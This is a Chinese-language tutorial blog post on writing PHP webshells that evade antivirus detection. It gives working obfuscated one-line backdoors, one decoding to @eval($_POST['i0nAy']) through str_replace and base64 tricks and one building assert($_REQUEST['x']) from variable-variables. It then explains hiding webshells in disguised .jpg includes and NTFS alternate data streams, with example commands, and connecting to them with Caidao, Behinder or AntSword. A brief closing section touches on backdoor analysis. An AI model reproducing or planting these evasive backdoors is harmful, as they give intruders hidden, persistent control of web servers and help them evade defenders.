美文网首页
13.免查杀脚本木马编写

13.免查杀脚本木马编写

作者: 皮蛋是个臭蛋 | 来源:发表于2020-08-20 20:31 被阅读0次

    免查杀木马编写的方法:
    把木马创建成函数,运行时调用函数、在线加密、组合法、变量覆盖

    1.把木马创建成函数,运行时调用函数。

    <?php 
    $mt="JF9QT1N"; 
    $ojj="QGV2YWwo";
    $hsa="UWydpMGle";
    $fnx="5BeSleleddKTs=";
    $zk = str_replace("d","","sdtdrd_redpdldadcde"); 
    $ef = $zk("z", "", "zbazsze64_zdzeczodze"); 
    $dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); 
    $zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); 
    $zvm(); 
    ?>
    
    str_replace:参数:("需要匹配的字符","替换字符","需要匹配的对象")
    
    $zk=str_replace("d","","sdtdrd_redpdldadcde")=str_replace    // $zk=str_replace
    $ef=str_replace("z", "", "zbazsze64_zdzeczodze")=base64_decode   // $ef=base64_decode
    $dva=str_replace("p","","pcprpepaptpe_fpupnpcptpipopn")=create_function  //$dva=create_function
    
    $ojj.$mt.$hsa.$fnx=QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=
    str_replace(("le", "", "QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=")=QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=
    
    base64_decode("QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=")=@eval($_POST['i0nAy']);
    create_function('',@eval($_POST['i0nAy']);)
    $zvm(); 
    
    
    
    image.png

    2.变量覆盖

    <?php
    $h='f';
    $$h=$_REQUEST['x'];                //$$h可以理解为先解析后边这个$h,然后在进行解析,最终解析成为$f
    $d='CHECK';
    $$d='ass';
    $$d=$CHECK.'ert';
    $CHECK($f);
    ?>
    
    

    3.组合法
    变量覆盖+在线加密

    4.在线加密

    2 后门分析

    后门分析的方法:关键字定位(通过对代码进行分析)、网络通信(f12)、使用wsexplorer进行抓包。

    1.webshell
    webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。也可以成为网站后门。

    抓取软件数据包的软件是wsexplorer.

    webshell免杀的方法:
    1.文件包含(可以将木马后缀改为jpg,写一个php代码包含这个jpg文件。)
    2.通过ntfs交换数据流文件实现文件隐藏。(可以使用软件okfiugenn进行删除数据流文件。)
    例子1. echo xxx >>test.txt :webshell.php (创建数据流文件,内容是保存到webshell.php中且隐藏。)
    dir /r 查看数据流文件

    例子2. notepad muma.php //使用记事本创建一句话木马
    type muma.php >>test.txt:muma.php //创建新的交换流文件

    数据流文件的访问方法:(不能直接被访问)
    1.可以通过包含文件执行数据流文件,在使用菜刀(冰蝎,蚁剑)进行连接。


    image.png

    或者使用手工进行执行。


    image.png

    2.直接在注册表

    相关文章

      网友评论

          本文标题:13.免查杀脚本木马编写

          本文链接:https://www.haomeiwen.com/subject/kzddjktx.html